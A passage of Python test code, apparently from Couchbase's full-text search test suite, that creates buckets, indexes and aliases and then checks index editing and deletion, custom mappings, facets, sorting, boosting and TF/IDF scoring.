emp = self._cb_cluster.get_bucket_by_name('emp')
# create "wiki" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="wiki",
num_replicas=0)
wiki = self._cb_cluster.get_bucket_by_name('wiki')
#load emp dataset into emp bucket
emp_gen = self.get_generator(dataset="emp", num_items=self._num_items)
wiki_gen = self.get_generator(dataset="wiki", num_items=self._num_items)
if self.es:
# make deep copies of the generators
import copy
emp_gen_copy = copy.deepcopy(emp_gen)
wiki_gen_copy = copy.deepcopy(wiki_gen)
load_tasks = self._cb_cluster.async_load_bucket_from_generator(
bucket=emp,
kv_gen=emp_gen)
load_tasks += self._cb_cluster.async_load_bucket_from_generator(
bucket=wiki,
kv_gen=wiki_gen)
if self.es:
# create empty ES indexes
self.es.create_empty_index("emp_es_index")
self.es.create_empty_index("wiki_es_index")
load_tasks.append(self.es.async_bulk_load_ES(index_name='emp_es_index',
gen=emp_gen_copy,
op_type='create'))
load_tasks.append(self.es.async_bulk_load_ES(index_name='wiki_es_index',
gen=wiki_gen_copy,
op_type='create'))
for task in load_tasks:
task.result()
# create indexes on both buckets
emp_index = self.create_index(emp, "emp_index")
wiki_index = self.create_index(wiki, "wiki_index")
self.wait_for_indexing_complete()
# create compound alias
alias = self.create_alias(target_indexes=[emp_index, wiki_index],
name="emp_wiki_alias")
if self.es:
self.es.create_alias(name="emp_wiki_es_alias",
indexes=["emp_es_index", "wiki_es_index"])
# run rqg on the alias
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias, es_index_name="emp_wiki_es_alias")
def index_wiki(self):
self.load_wiki(lang=self.lang)
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "wiki_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
def delete_index_then_query(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_fts_index(index.name)
try:
hits2, _, _, _ = index.execute_query(self.sample_query)
except Exception as e:
# expected, pass test
self.log.info("Expected exception: {0}".format(e))
def drop_bucket_check_index(self):
count = 0
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_bucket("default")
self.sleep(20, "waiting for bucket deletion to be known by fts")
try:
count = index.get_indexed_doc_count()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
# at this point, index has been deleted,
# remove index from list of indexes
self._cb_cluster.get_indexes().remove(index)
if count:
self.fail("Able to retrieve index json from index "
"built on bucket that was deleted")
def delete_index_having_alias(self):
index, alias = self.create_simple_alias()
self._cb_cluster.delete_fts_index(index.name)
hits, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits))
if hits >= 0:
self.fail("Query alias with deleted target returns query results!")
def delete_index_having_alias_recreate_index_query(self):
index, alias = self.create_simple_alias()
hits1, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits1))
index.delete()
self.log.info("Recreating deleted index ...")
bucket = self._cb_cluster.get_bucket_by_name('default')
self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
hits2, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits2))
if hits1 != hits2:
self.fail("Hits from alias before index recreation: %s,"
" after recreation: %s" %(hits1, hits2))
def create_alias_on_deleted_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
from .fts_base import INDEX_DEFAULTS
alias_def = INDEX_DEFAULTS.ALIAS_DEFINITION
alias_def['targets'][index.name] = {}
alias_def['targets'][index.name]['indexUUID'] = index.get_uuid()
index.delete()
try:
self.create_alias([index], alias_def)
self.fail("Was able to create alias on deleted target")
except Exception as e:
self.log.info("Expected exception :{0}".format(e))
def edit_index_new_name(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
index.name = "new_index"
try:
index.update()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
def edit_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
#hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
index.update()
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
def update_index_during_large_indexing(self):
"""
MB-22410 - Updating index with a large dirty write queue
items = some millions defined at run_time using items param
"""
rest = RestConnection(self._cb_cluster.get_random_fts_node())
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items//2)
status, stat_value = rest.get_fts_stats(index_name=index.name,
bucket_name=bucket.name,
stat_name='num_recs_to_persist')
self.log.info("Data(metadata + docs) in write queue is {0}".
format(stat_value))
new_plan_param = self.construct_plan_params()
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10, "Wait for index to get updated...")
self.is_index_partitioned_balanced(index=index)
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
# see if the index is still query-able with all data
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
self.log.info("Hits: %s" % hits)
def delete_index_during_large_indexing(self):
"""
MB-22410 - Deleting index with a large dirty write queue is slow
items = 5M
"""
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items//2)
index.delete()
self.sleep(5)
try:
_, defn = index.get_index_defn()
self.log.info(defn)
self.fail("ERROR: Index definition still exists after deletion! "
"%s" %defn['indexDef'])
except Exception as e:
self.log.info("Expected exception caught: %s" % e)
def edit_index_negative(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
# update params with plan params values to check for validation
index.index_definition['params'] = \
index.build_custom_index_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as e:
self.log.info("Expected exception: %s" % e)
def index_query_beer_sample(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
self.load_sample_buckets(server=master, bucketName="beer-sample")
bucket = self._cb_cluster.get_bucket_by_name("beer-sample")
index = self.create_index(bucket, "beer-index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
query = {"match": "cafe", "field": "name"}
hits, _, _, _ = index.execute_query(query,
zero_results_ok=False,
expected_hits=10)
self.log.info("Hits: %s" % hits)
def index_query_custom_mapping(self):
"""
uses RQG for custom mapping
"""
# create a custom map, disable default map
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
if self.es:
self.create_es_index_mapping(index.es_custom_map,
index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_string_combinations(self):
"""
uses RQG framework minus randomness for testing query-string combinations of '', '+', '-'
{
mterms := [
[], // none
["+Wikipedia"], // one term
["+Wikipedia", "+English"], // two terms
["+the"], // one term (stop word)
["+the", "+English"], // two terms (one stop)
["+the", "+and"], // two terms (both stop)
]
sterms = [
[], // none
["Category"], // one term
["Category", "United"], // two terms
["of"], // one term (stop word)
["of", "United"], // two terms (one stop)
["of", "at"], // two terms (both stop)
]
nterms = [
[], // none
["-language"], // one term
["-language", "-States"], // two terms
["-for"], // one term (stop word)
["-for", "-States"], // two terms (one stop)
["-for", "-with"], // two terms (both stop)
]
}
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.fts_queries = []
mterms = [[],
["+revision.text.#text:\"Wikipedia\""],
["+revision.text.#text:\"Wikipedia\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"and\""]]
sterms = [[],
["revision.text.#text:\"Category\""],
["revision.text.#text:\"Category\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"at\""]]
nterms = [[],
["-revision.text.#text:\"language\""],
["-revision.text.#text:\"language\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"with\""]]
for mterm in mterms:
for sterm in sterms:
for nterm in nterms:
clause = (' '.join(mterm) + ' ' + ' '.join(sterm) + ' ' + ' '.join(nterm)).strip()
query = {"query": clause}
index.fts_queries.append(json.loads(json.dumps(query, ensure_ascii=False)))
if self.compare_es:
self.es.es_queries.append(json.loads(json.dumps({"query": {"query_string": query}},
ensure_ascii=False)))
self.run_query_and_compare(index)
def index_edit_and_query_custom_mapping(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
error_msg = str(err)
self.log.error(err)
fail = True
self.log.info("Editing custom index with new map...")
index.generate_new_custom_map(seed=index.cm_id+10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map)
self.load_data()
self.wait_for_indexing_complete()
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
if fail:
raise error_msg
def index_query_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.load_data()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def load_index_query_all_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.sleep(20)
self.generate_random_queries(index, self.num_queries, self.query_types)
from threading import Thread
threads = []
threads.append(Thread(target=self.load_data,
name="loader thread",
args=()))
threads.append(Thread(target=self.run_query_and_compare,
name="query thread",
args=(index,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def index_edit_and_query_custom_analyzer(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
self.log.error(err)
fail = True
self.log.info("Editing custom index with new custom analyzer...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.wait_for_indexing_complete()
try:
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
except AssertionError as err:
self.log.error(err)
fail = True
if fail:
raise err
def index_delete_custom_analyzer(self):
"""
Create Index and then update by deleting custom analyzer in use, or custom filter in use.
"""
error_msg = TestInputSingleton.input.param('error_msg', '')
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
self.log.info("Editing custom index by deleting custom analyzer/filter in use...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as err:
self.log.error(err)
if str(err).count(error_msg, 0, len(str(err))):
self.log.info("Error is expected")
else:
self.log.info("Error is not expected")
raise err
def test_field_name_alias(self):
"""
Test the Searchable As property in field mapping
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, matches, time_taken, status = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_one_field_multiple_analyzer(self):
"""
1. Create an default FTS index on wiki dataset
2. Update it to add a field mapping for revision.text.#text field with 'en' analyzer
3. Should get 0 search results for a query
4. Update it to add another field mapping for the same field, with 'fr' analyzer
5. Same query should yield more results now.
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="en")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits1", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
index.add_analyzer_to_existing_field_map(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="fr")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits2", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
def test_facets(self):
field_indexed = self._input.param("field_indexed", True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
index.validate_facets_in_search_results(no_of_hits=hits,
facets_returned=facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ str(err))
def test_facets_during_index(self):
field_indexed = self._input.param("field_indexed", True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.sleep(5)
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
while not self.is_index_complete(index.name):
zero_results_ok = True
try:
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ str(err))
def test_doc_config(self):
# delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
# Load Travel Sample bucket and create an index
self.load_sample_buckets(server=master, bucketName="travel-sample")
bucket = self._cb_cluster.get_bucket_by_name("travel-sample")
index = self.create_index(bucket, "travel-index")
self.sleep(10)
self.wait_for_indexing_complete()
# Add Type Mapping
index.add_type_mapping_to_index_definition(type="airport",
analyzer="en")
index.add_type_mapping_to_index_definition(type="hotel",
analyzer="en")
mode = self._input.param("mode", "type_field")
index.add_doc_config_to_index_definition(mode=mode)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
# Run Query
expected_hits = int(self._input.param("expected_hits", 0))
if not expected_hits:
zero_results_ok = True
else:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_boost_query_type(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
zero_results_ok = False
expected_hits = 5
# Run Query w/o Boosting and compare the scores for Docs emp10000086 &
# emp10000021. Should be the same
query = {"query": "dept:Marketing name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_before_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000045')
score_before_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000053')
self.log.info("Scores before boosting:")
self.log.info("")
self.log.info("emp10000045: %s", score_before_boosting_doc1)
self.log.info("emp10000053: %s", score_before_boosting_doc2)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
if not score_before_boosting_doc1 == score_before_boosting_doc2:
self.fail("Testcase failed: Scores for emp10000045 & emp10000053 "
"are not equal before boosting")
# Run Query w/o Boosting and compare the scores for Docs emp10000021 &
# emp10000086. emp10000021 score should have improved w.r.t. emp10000086
query = {"query": "dept:Marketing^5 name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_after_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000045')
score_after_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000053')
self.log.info("Scores after boosting:")
self.log.info("")
self.log.info("emp10000045: %s", score_after_boosting_doc1)
self.log.info("emp10000053: %s", score_after_boosting_doc2)
assert score_after_boosting_doc1 == score_after_boosting_doc2
assert score_before_boosting_doc1 < score_after_boosting_doc1
assert score_before_boosting_doc2 < score_after_boosting_doc2
def test_doc_id_query_type(self):
# Create bucket, create index
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
expected_hits = int(self._input.param("expected_hits", 0))
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
# From the Query string, fetch the Doc IDs
doc_ids = copy.deepcopy(query['ids'])
# If invalid_doc_id param is passed, add this to the query['ids']
invalid_doc_id = self._input.param("invalid_doc_id", 0)
if invalid_doc_id:
query['ids'].append(invalid_doc_id)
# If disjuncts_query is passed, join query and disjuncts_query
# to form a new query string
disjuncts_query = self._input.param("disjuncts_query", None)
if disjuncts_query:
if isinstance(disjuncts_query, str):
disjuncts_query = json.loads(disjuncts_query)
new_query = {}
new_query['disjuncts'] = []
new_query['disjuncts'].append(disjuncts_query)
new_query['disjuncts'].append(query)
query = new_query
# Execute Query
zero_results_ok = False
try:
for index in self._cb_cluster.get_indexes():
n1ql_query = "select d, meta().id from default d where search(d, "+json.dumps(query)+") and type='emp'"
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
# For each doc id passed in the query, validate the
# presence in the search results
for doc_id in doc_ids:
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=doc_id), "Doc ID "
"%s is not present in Search results"
% doc_id)
if self.run_via_n1ql:
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=n1ql_results['results'], doc_id=doc_id), "Doc ID "
"%s is not present in N1QL Search results"
% doc_id)
score = index.get_score_from_query_result_content\
(contents=contents, doc_id=doc_id)
self.log.info ("Score for Doc ID {0} is {1}".
format(doc_id, score))
if invalid_doc_id:
# Validate if invalid doc id was passed, it should
# not be present in the search results
self.assertFalse(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=invalid_doc_id),
"Doc ID %s is present in Search results"
% invalid_doc_id)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_sorting_of_results(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_sorting_of_results_during_indexing(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
#self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
#expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
while not self.is_index_complete(index.name):
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
#self.sleep(5)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_sorting_of_results_on_non_indexed_fields(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="name",
field_type="text",
field_alias="name",
analyzer="en")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=self.sort_fields_list,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_scoring_tf_score(self):
"""
Test if the TF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"cat - a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
tf_score1, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 1 = %s" % tf_score1)
tf_score2, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 2 = %s" % tf_score2)
tf_score3, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 3 = %s" % tf_score3)
self.assertTrue(tf_score1 > tf_score2 > tf_score3,
"Testcase failed. TF score for Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def compare_n1ql_fts_scoring(self, n1ql_query='', raw_hits=[]):
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertEqual(len(n1ql_results['results']), len(raw_hits),
"Return values are not the same for n1ql query and fts request.")
for res in n1ql_results['results']:
for hit in raw_hits:
if res['id'] == hit['id']:
self.assertEqual(res['score'], hit['score'],
"Scoring is not the same for n1ql result and fts request hit")
def test_scoring_idf_score(self):
"""
Test if the IDF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog and a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy fox and a brown fox\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
